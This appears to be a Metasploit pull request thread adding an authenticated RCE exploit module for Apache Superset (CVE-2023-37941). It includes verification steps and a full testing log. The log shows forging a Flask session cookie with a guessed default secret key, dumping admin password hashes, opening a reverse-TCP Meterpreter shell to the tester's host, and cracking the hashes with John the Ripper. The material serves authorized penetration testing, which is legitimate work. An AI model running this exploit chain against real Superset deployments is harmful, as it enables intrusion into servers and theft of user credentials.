Apache Superset RCE (CVE-2023-37941)

[h00die]

This is a follow-on to #18180 with an additional module to run the RCE since it was released 9/6/2023 (yesterday).

Verification

• Start msfconsole
• Do: use exploit/linux/http/apache_superset_cookie_sig_rce
• Do: set rhost [ip]
• Do: set username [username]
• Do: set password [password]
• Do: run
• You should get a shell.
• Make sure you can export creds (creds -o /tmp/hashes.jtr and creds -o /tmp/hashes.hcat) and crack them

[smcintyre-r7]

Instead of calling system to execute it in a new process, have you tried just exec'ing the Python payload? If that works when forking is disabled and the app continues to run, it'd be a better way to execute the payload. If the app blocks though when the payload does not fork, then what you're doing now is probably better.

[h00die]

I didn't try changing it, I kept what was in the PoC as it works, and I like working things

[h00die]

still in draft, had been waiting on the other module to land to get this all fixed up. I've already addressed most of these comments in an upcoming commit

[h00die]

Still a work in progress, but the following updates:

1. we now get the hash and make it usable
2. we now priv esc with the flask signed cookie stuff
3. we can crack the hash in jtr/hashcat

Still working on:

1. cleanup. I can get the values from the DB that we overwrote, just got to figure out how to write them back successfully. Just need some more time.

[h00die]

should be good for review

[smcintyre-r7]

I'm proposing a few changes here h00die#25.

I tested @adfoster-r7's comment about using a relative path and it does work, however the application's working directory in docker is /app so the path would need to be superset_home/superset.db which probably isn't any better.

I also moved the add_equals_to_base64 function to no longer be public.

[smcintyre-r7]

Changes look good to me now. I was able to confirm the exploit module is working correctly and that the hashes can be cracked. Thanks!

Testing Output

msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > show options 

Module options (exploit/linux/http/apache_superset_cookie_sig_rce):

   Name              Current Setting                                                                               Required  Description
   ----              ---------------                                                                               --------  -----------
   ADMIN_ID          1                                                                                             yes       The ID of an admin account
   DATABASE          /app/superset_home/superset.db                                                                yes       The superset database location
   PASSWORD          Password1!                                                                                    yes       The password for the specified username
   Proxies                                                                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS            192.168.159.128                                                                               yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             8088                                                                                          yes       The target port (TCP)
   SECRET_KEYS_FILE  /home/smcintyre/Repositories/metasploit-framework.pr/data/wordlists/superset_secret_keys.txt  no        File containing secret keys to try, one per line
   SSL               false                                                                                         no        Negotiate SSL/TLS for outgoing connections
   TARGETURI         /                                                                                             yes       Relative URI of Apache Superset installation
   USERNAME          smcintyre                                                                                     yes       The username to authenticate as
   VHOST                                                                                                           no        HTTP server virtual host


Payload options (python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > run

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.128:8088 - Attempting login
[+] 192.168.159.128:8088 - Logged in Cookie: session=.eJwlj8EOwjAMQ_-lZw5Jm6YLPzOlaSIQCKQNToh_pxNH23qW_UlrbL5f0vm1vf2U1utI56S0QK9NqREHQ4ymUI2sZBktpo1oXaNhY2WFMkBZmloX68bdIGp1MegjIiOzT1CpE5OSoeSAQVVDarOYTVAUpfCMKCPMynRKtm-xvp43f8w9XmjgApiPTYxcKxKpSmaELBRaFmA3mdz9aXr3g3lM9d59-1_K6fsDSsxCXA.ZShegQ.o7_HEl57_99LV-EY3q_irDEeGzg;
[+] 192.168.159.128:8088 - Found secret key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 192.168.159.128:8088 - Modified cookie: {"_fresh"=>true, "_id"=>"a480b57a4746f60fd7a05c4c329d7fa4711cbaf7176a6a03d0a697acb9cbc6bc0f55e9c0bdff2166e329a4b464a4c192f0d45af957cf1cb03a19364c142106a6", "csrf_token"=>"e34d1801257a461655144aa92610294fa3806ec9", "locale"=>"en", "user_id"=>1}
[*] 192.168.159.128:8088 - Attempting to resign with key: CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET
[*] 192.168.159.128:8088 - New signed cookie: eyJfZnJlc2giOnRydWUsIl9pZCI6ImE0ODBiNTdhNDc0NmY2MGZkN2EwNWM0YzMyOWQ3ZmE0NzExY2JhZjcxNzZhNmEwM2QwYTY5N2FjYjljYmM2YmMwZjU1ZTljMGJkZmYyMTY2ZTMyOWE0YjQ2NGE0YzE5MmYwZDQ1YWY5NTdjZjFjYjAzYTE5MzY0YzE0MjEwNmE2IiwiY3NyZl90b2tlbiI6ImUzNGQxODAxMjU3YTQ2MTY1NTE0NGFhOTI2MTAyOTRmYTM4MDZlYzkiLCJsb2NhbGUiOiJlbiIsInVzZXJfaWQiOjF9.ZShegQ.ijn0PJLGRCJRDNSY6Sp8K_giF0o
[+] 192.168.159.128:8088 - Cookie validated to user: admin
[+] Successfully created db mapping with id: 1
[+] Using tab: 1
[+] Superset Creds
==============

  Username   Password
  --------   --------
  admin      $pbkdf2-sha256$260000$OTRiR0JqRUJ1cG5GMVVXMQ$w5UK3qcE5ttgw.y48BRyhkmwdA0CKT/QF4144Kx7laU
  smcintyre  $pbkdf2-sha256$260000$MDZZczRFWEtPVXZESnQ2Ug$ZKKGOkQomTWzw1q3Znrmf8T5tY.kwm0L3g2VUKffBZQ

[+] New Dashboard id: 1
[+] Dashboard permalink key: k5w4RY86rOW
[*] Triggering payload
[*] Sending stage (24768 bytes) to 172.17.0.4
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 172.17.0.4:42064) at 2023-10-12 17:00:51 -0400
[*] Unsetting RCE Payloads
[*] Deleting dashboard
[*] Deleting sqllab tab
[*] Deleting database mapping

meterpreter > getuid
Server username: superset
meterpreter > sysinfo
Computer        : 4d9b1f7710dd
OS              : Linux 6.2.15-100.fc36.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 11 16:51:53 UTC 2023
Architecture    : x64
System Language : C
Meterpreter     : python/linux
meterpreter > pwd
/app
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > creds -o /tmp/hashes.jtr
[*] Wrote creds to /tmp/hashes.jtr
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > cat /tmp/hashes.jtr
[*] exec: cat /tmp/hashes.jtr

admin:$pbkdf2-sha256$260000$OTRiR0JqRUJ1cG5GMVVXMQ$w5UK3qcE5ttgw.y48BRyhkmwdA0CKT/QF4144Kx7laU:::::310:
smcintyre:$pbkdf2-sha256$260000$MDZZczRFWEtPVXZESnQ2Ug$ZKKGOkQomTWzw1q3Znrmf8T5tY.kwm0L3g2VUKffBZQ:::::311:
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > creds -o /tmp/hashes.hcat
[*] Wrote creds to /tmp/hashes.hcat
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > cat /tmp/hashes.hcat
[*] exec: cat /tmp/hashes.hcat

sha256:260000:OTRiR0JqRUJ1cG5GMVVXMQ==:w5UK3qcE5ttgw+y48BRyhkmwdA0CKT/QF4144Kx7laU=
sha256:260000:MDZZczRFWEtPVXZESnQ2Ug==:ZKKGOkQomTWzw1q3Znrmf8T5tY+kwm0L3g2VUKffBZQ=
msf6 exploit(linux/http/apache_superset_cookie_sig_rce) > 

./john /tmp/hashes.jtr 
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (PBKDF2-HMAC-SHA256 [PBKDF2-SHA256 256/256 AVX2 8x])
Cost 1 (iteration count) is 260000 for all loaded hashes
Will run 16 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Warning: Only 116 candidates buffered for the current salt, minimum 128 needed for performance.
admin            (admin)     
Almost done: Processing the remaining buffered candidate passwords, if any.
1g 0:00:00:05 DONE 1/3 (2023-10-12 17:04) 0.1968g/s 237.2p/s 237.4c/s 237.4C/s smcintyre1940..Smcintyre1900
Proceeding with wordlist:./password.lst
Enabling duplicate candidate password suppressor

[smcintyre-r7]

Release Notes

This adds an exploit for CVE-2023-37941 which is an authenticated RCE in Apache Superset.